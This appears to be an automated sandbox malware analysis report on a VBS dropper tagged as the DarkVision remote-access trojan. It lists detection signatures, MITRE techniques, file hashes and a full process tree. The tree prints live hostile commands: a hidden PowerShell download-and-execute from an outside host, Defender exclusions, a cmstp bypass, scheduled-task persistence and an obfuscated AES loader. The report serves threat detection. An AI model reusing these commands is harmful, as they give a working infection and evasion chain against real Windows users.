darkvision | 13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace

Analysis

max time kernel
150s
max time network
278s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 08:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2570_output.vbs
Size

421KB
MD5

1304afcdfc224427dfe647dd10025628
SHA1

54de753563e6a041ca67a90e50c121cd32f2e125
SHA256

13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace
SHA512

23dcf2384265354d1596934f5d428df2518a410fd074ac6127c9f6b6ac896472542620966ffe6c39a3e74157f3eb3f09e2d481ee265f969861fcc5f3bbac0506
SSDEEP

6144:URCyzWhqzOEHu+s+7e7C8526sSil7tJA1ikRAG9cuyVa8iix6gwXUhkSn:w8hbmbh7uiWct2yVa8ArUhkSn

Score

10^/10

darkvision execution rat

Malware Config

Signatures

DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	4848	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4848	powershell.exe
3228	powershell.exe
548	powershell.exe
1800	powershell.exe
3912	powershell.exe
4644	powershell.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/4204-143-0x000002C4C12A0000-0x000002C4C12F6000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
3644	server.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
264	timeout.exe
4108	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
920	taskkill.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
4848	powershell.exe
4848	powershell.exe
3228	powershell.exe
3228	powershell.exe
4280	powershell.exe
4280	powershell.exe
548	powershell.exe
548	powershell.exe
2308	powershell.exe
2308	powershell.exe
1800	powershell.exe
1800	powershell.exe
4204	powershell.exe
4204	powershell.exe
3912	powershell.exe
3912	powershell.exe
4552	powershell.exe
4552	powershell.exe
4644	powershell.exe
4644	powershell.exe
3644	server.exe
3644	server.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	920	taskkill.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeIncreaseQuotaPrivilege	2308	powershell.exe
Token: SeSecurityPrivilege	2308	powershell.exe
Token: SeTakeOwnershipPrivilege	2308	powershell.exe
Token: SeLoadDriverPrivilege	2308	powershell.exe
Token: SeSystemProfilePrivilege	2308	powershell.exe
Token: SeSystemtimePrivilege	2308	powershell.exe
Token: SeProfSingleProcessPrivilege	2308	powershell.exe
Token: SeIncBasePriorityPrivilege	2308	powershell.exe
Token: SeCreatePagefilePrivilege	2308	powershell.exe
Token: SeBackupPrivilege	2308	powershell.exe
Token: SeRestorePrivilege	2308	powershell.exe
Token: SeShutdownPrivilege	2308	powershell.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeSystemEnvironmentPrivilege	2308	powershell.exe
Token: SeRemoteShutdownPrivilege	2308	powershell.exe
Token: SeUndockPrivilege	2308	powershell.exe
Token: SeManageVolumePrivilege	2308	powershell.exe
Token: 33	2308	powershell.exe
Token: 34	2308	powershell.exe
Token: 35	2308	powershell.exe
Token: 36	2308	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeIncreaseQuotaPrivilege	1800	powershell.exe
Token: SeSecurityPrivilege	1800	powershell.exe
Token: SeTakeOwnershipPrivilege	1800	powershell.exe
Token: SeLoadDriverPrivilege	1800	powershell.exe
Token: SeSystemProfilePrivilege	1800	powershell.exe
Token: SeSystemtimePrivilege	1800	powershell.exe
Token: SeProfSingleProcessPrivilege	1800	powershell.exe
Token: SeIncBasePriorityPrivilege	1800	powershell.exe
Token: SeCreatePagefilePrivilege	1800	powershell.exe
Token: SeBackupPrivilege	1800	powershell.exe
Token: SeRestorePrivilege	1800	powershell.exe
Token: SeShutdownPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeSystemEnvironmentPrivilege	1800	powershell.exe
Token: SeRemoteShutdownPrivilege	1800	powershell.exe
Token: SeUndockPrivilege	1800	powershell.exe
Token: SeManageVolumePrivilege	1800	powershell.exe
Token: 33	1800	powershell.exe
Token: 34	1800	powershell.exe
Token: 35	1800	powershell.exe
Token: 36	1800	powershell.exe
Token: SeIncreaseQuotaPrivilege	1800	powershell.exe
Token: SeSecurityPrivilege	1800	powershell.exe
Token: SeTakeOwnershipPrivilege	1800	powershell.exe
Token: SeLoadDriverPrivilege	1800	powershell.exe
Token: SeSystemProfilePrivilege	1800	powershell.exe
Token: SeSystemtimePrivilege	1800	powershell.exe
Token: SeProfSingleProcessPrivilege	1800	powershell.exe
Token: SeIncBasePriorityPrivilege	1800	powershell.exe
Token: SeCreatePagefilePrivilege	1800	powershell.exe
Token: SeBackupPrivilege	1800	powershell.exe
Token: SeRestorePrivilege	1800	powershell.exe
Token: SeShutdownPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeSystemEnvironmentPrivilege	1800	powershell.exe
Token: SeRemoteShutdownPrivilege	1800	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 4504 wrote to memory of 4848	4504	WScript.exe	83
PID 4504 wrote to memory of 4848	4504	WScript.exe	83
PID 4848 wrote to memory of 5040	4848	powershell.exe	86
PID 4848 wrote to memory of 5040	4848	powershell.exe	86
PID 5040 wrote to memory of 1792	5040	csc.exe	87
PID 5040 wrote to memory of 1792	5040	csc.exe	87
PID 4848 wrote to memory of 3316	4848	powershell.exe	88
PID 4848 wrote to memory of 3316	4848	powershell.exe	88
PID 4504 wrote to memory of 4136	4504	WScript.exe	109
PID 4504 wrote to memory of 4136	4504	WScript.exe	109
PID 4136 wrote to memory of 2068	4136	cmd.exe	111
PID 4136 wrote to memory of 2068	4136	cmd.exe	111
PID 2068 wrote to memory of 2160	2068	cmd.exe	113
PID 2068 wrote to memory of 2160	2068	cmd.exe	113
PID 2068 wrote to memory of 4280	2068	cmd.exe	114
PID 2068 wrote to memory of 4280	2068	cmd.exe	114
PID 4280 wrote to memory of 548	4280	powershell.exe	115
PID 4280 wrote to memory of 548	4280	powershell.exe	115
PID 4280 wrote to memory of 2308	4280	powershell.exe	116
PID 4280 wrote to memory of 2308	4280	powershell.exe	116
PID 4280 wrote to memory of 1800	4280	powershell.exe	119
PID 4280 wrote to memory of 1800	4280	powershell.exe	119
PID 4280 wrote to memory of 4820	4280	powershell.exe	121
PID 4280 wrote to memory of 4820	4280	powershell.exe	121
PID 4820 wrote to memory of 3844	4820	cmd.exe	123
PID 4820 wrote to memory of 3844	4820	cmd.exe	123
PID 3844 wrote to memory of 3516	3844	cmd.exe	125
PID 3844 wrote to memory of 3516	3844	cmd.exe	125
PID 3844 wrote to memory of 4204	3844	cmd.exe	126
PID 3844 wrote to memory of 4204	3844	cmd.exe	126
PID 4204 wrote to memory of 3912	4204	powershell.exe	127
PID 4204 wrote to memory of 3912	4204	powershell.exe	127
PID 4204 wrote to memory of 4552	4204	powershell.exe	128
PID 4204 wrote to memory of 4552	4204	powershell.exe	128
PID 2068 wrote to memory of 264	2068	cmd.exe	129
PID 2068 wrote to memory of 264	2068	cmd.exe	129
PID 4204 wrote to memory of 4644	4204	powershell.exe	131
PID 4204 wrote to memory of 4644	4204	powershell.exe	131
PID 4204 wrote to memory of 3644	4204	powershell.exe	133
PID 4204 wrote to memory of 3644	4204	powershell.exe	133
PID 3844 wrote to memory of 4108	3844	cmd.exe	134
PID 3844 wrote to memory of 4108	3844	cmd.exe	134

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2570_output.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5rphi5yc\5rphi5yc.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5040
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBFD5.tmp" "c:\Users\Admin\AppData\Local\Temp\5rphi5yc\CSC9CE4B14176D540C1982A42357359F5F.TMP"
      4⤵
      PID:1792
- - C:\windows\system32\cmstp.exe
    "C:\windows\system32\cmstp.exe" /au C:\windows\temp\ix23lsgd.inf
    3⤵
    PID:3316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
      4⤵
      PID:2160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4280
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 68537' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network68537Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network68537Man.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network68537Man.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network68537Man.cmd';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
        7⤵
        
        PID:3516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network68537Man')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 68537' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network68537Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4644
        
        C:\ProgramData\Server\server.exe
        
        "C:\ProgramData\Server\server.exe" {BBD4D601-E96C-4865-9F7D-5ED63C15EBAF}
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3644
        
        C:\Windows\system32\timeout.exe
        
        timeout /nobreak /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4108
  - - C:\Windows\system32\timeout.exe
      timeout /nobreak /t 1
      4⤵
      Delays execution with timeout.exe
      PID:264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3228

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Server\server.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
1cee9af7ed769bbf2c4072a8f4fc6b7d

SHA1
99dc22db49bc815679e4d1bde6afe912d613359c

SHA256
3cf0d746d4299528cfb59741897b58c65f07d9e1518eafd3677439a3d29279b0

SHA512
1b403e1201213d6496a044960e3e4d1ef8c4d2587113d152419f33095fbedba451f05e2f455ae69c18896a321dc27061228ba5f4fe97697d4ed15cb68a2469f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c0b4e2a13280526797ed7b24e81ad5fd

SHA1
c57e948de31a927a96eb5a57b2f20cfe6ee04573

SHA256
29a78cfc5dec9c370862e36999f0581ec231b0e829951c12c61c3d5be9f084c7

SHA512
55298883d44a4b5a48146aadacbac4147246da57a424b2fc2a40ea544e7405c2ee7fcfcc36dd0c92653915f65e22aa9ba292eda2ed12de5088347186ba49c9f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9d662ecae338ca923a784422a86e9925

SHA1
ccdbbd6f3a1801b13f503d92f5d48fe5041ab495

SHA256
af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e

SHA512
5455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0610ff750e2604faba4733abd48fd73a

SHA1
1a561ce48f49bca728b70b4c114fa27b23dd7dc2

SHA256
fdc9aebca677a3abacdb5d191549012afef9ab6ffb9963156d8c2470002fc382

SHA512
f4eb3bc6585b49d4002b99f852ef4546790e2c520c49c6b77b1892eda83581446306617974977ecadecd00ccdb0522962f5e04d3ad78654508aac547f8e7d8bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1759665c7e25e0b5b1ec0c400c9eb801

SHA1
11105cbd1bc7ae8cd2a9d875d39316c19bad3d6c

SHA256
8a89f1bc962820f2cdf55e5dd5acc8205ac9aa2c328631a12972f32687f67bbb

SHA512
30019a7ca88b92c9086d3f9fd860638dbd2d546607e748a8395300c9f470e165bbc8bb0671670d71d2b6778cf3a0713292ad2967b3bed69d0263cf84e6c3de1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4a307fb9fc1e0b740ac8aa8b497a907c

SHA1
f0d72b4ad274dcf9804f587bef72dda7549656fa

SHA256
bd02ccfa750444162c808174944f13989c58f12d3bb107bf52b44887b5d9170d

SHA512
6f26b452c79e3e92c47ca97750f1de173b891d8ad583941892b074a1f21d0bb196bb0384b5cad248ee1904662d7a3eabfb91bd7cd08ba691fe0631fb6c4d03c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\5rphi5yc\5rphi5yc.dll

Filesize
4KB

MD5
d76ef5b751c5430d307a1445b1c73218

SHA1
a102a34927adadeff263e47a93e35aa768faa12b

SHA256
088178349ab4526b8281bcb87f62f6c44eb58c5fdaa428a1972f42d5c2d9e038

SHA512
0c15f09679e009e3f29f0c31c9539d7109ba80c69a7c2b59319b6a56b9bcda51e9468b8f02338a337061c85a633446c08e627aba4e82cb9b64d10e5d007c0580

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBFD5.tmp

Filesize
1KB

MD5
77f8e5816874bffe2ec08577d77bd508

SHA1
16494f3cb0f9419b17a9ce6b8f8dd325430111c6

SHA256
b5dad42de15257a141f5ba254bf48dd4e08171bac897fa14dd9ceae116ff03a7

SHA512
0492566e0130b91b9b1c33e7c6003e8332c406a41cba57f9136d0b768a0469401d6b59c5e25b8f06f8a80085b08d2bb0215ccc14ecab68c53f56f3965acf7cef

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o3maqyia.kjc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\n1.bat

Filesize
420KB

MD5
a21d4680c8d115c444119d6b1ca6aed6

SHA1
fdbb2d3c7eb9ea5c93781f91bf2157d25f82c2f2

SHA256
1f25a0b4e9b17c826aa68d775dab0605edbddf39963943358406285f157b4e9f

SHA512
b3b9ce5c820399bd7f8f80af4300328a5153ae8b15f2b00c85dba1fc983d02e739cae84ded8e831e845443e3226ff778c146598b0089076fcd9ac59830a47452

Download Submit
C:\windows\temp\ix23lsgd.inf

Filesize
675B

MD5
0a85805c6649ad8e6f40c9ddc1258a49

SHA1
69ca8a686c49218281a09bbed22ef55654a04459

SHA256
f20428b0f70a5fa861f27eef9583b473217ee467ef39f475d337f073851436be

SHA512
16775646f1df49f479e967c885e9948c52fcd31abc2041c63a50fd32e1380d3d963612d02f2db62e39c3bdcc959eb2d56f40d9f0f82a36897c8340206e355fad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5rphi5yc\5rphi5yc.0.cs

Filesize
2KB

MD5
b8f676e5e58a88c030c8437cf8c44510

SHA1
d2a94f790a3f41e2e207b6875c3215ad6788d902

SHA256
4580f48e57bafd774e5e2f48b8a7c67541f6cffd366fe702d1d414ca74abe1ab

SHA512
66af99543b3d818bcc700e32686067c8483135f94492f3e6f5a58c8d55ef6f4488052a9311d37fc822284f41b0eec0edfcf12beba4b91b62d42acc3578220b7e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5rphi5yc\5rphi5yc.cmdline

Filesize
369B

MD5
3acc037216544a6c5df22a4372fc7257

SHA1
99a9e92dfcc76afeb1338b50a921f8f29918525c

SHA256
ae3ebca735ded701a44d687c26d4bb946211c8bcc0de83a4f713f02c1c26eac9

SHA512
8d47cf3111b97fe305dc927524761f0e0dd0093200f8c23b51d9424d87e4788b055ab901700b0913a412d471502c10c9b14f4bb03da043ca39e7060f9a9ee907

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5rphi5yc\CSC9CE4B14176D540C1982A42357359F5F.TMP

Filesize
652B

MD5
